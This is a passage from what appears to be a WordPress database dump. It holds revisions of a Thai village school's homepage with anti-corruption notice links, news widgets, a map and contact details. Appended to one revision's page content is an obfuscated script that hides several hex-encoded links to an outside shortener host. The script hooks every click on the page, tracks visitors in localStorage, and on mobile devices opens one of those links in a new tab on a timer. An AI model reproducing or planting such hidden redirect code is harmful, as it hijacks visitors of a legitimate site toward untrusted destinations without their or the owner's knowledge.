{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:34:17','2024-08-07 14:34:17','',14,'http://pakhaeng.ssk.in.th/?p=663',0,'revision','',0),
(665,1,'2024-08-07 21:35:00','2024-08-07 14:35:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"thumbSize\":\"full\",\"ids\":[660,661],\"type\":\"slider\",\"imageRatio\":\"land169\",\"imagesDynamic\":[{\"id\":660,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=660\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"width\":1500,\"height\":600},{\"id\":661,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=661\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"width\":1500,\"height\":600}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 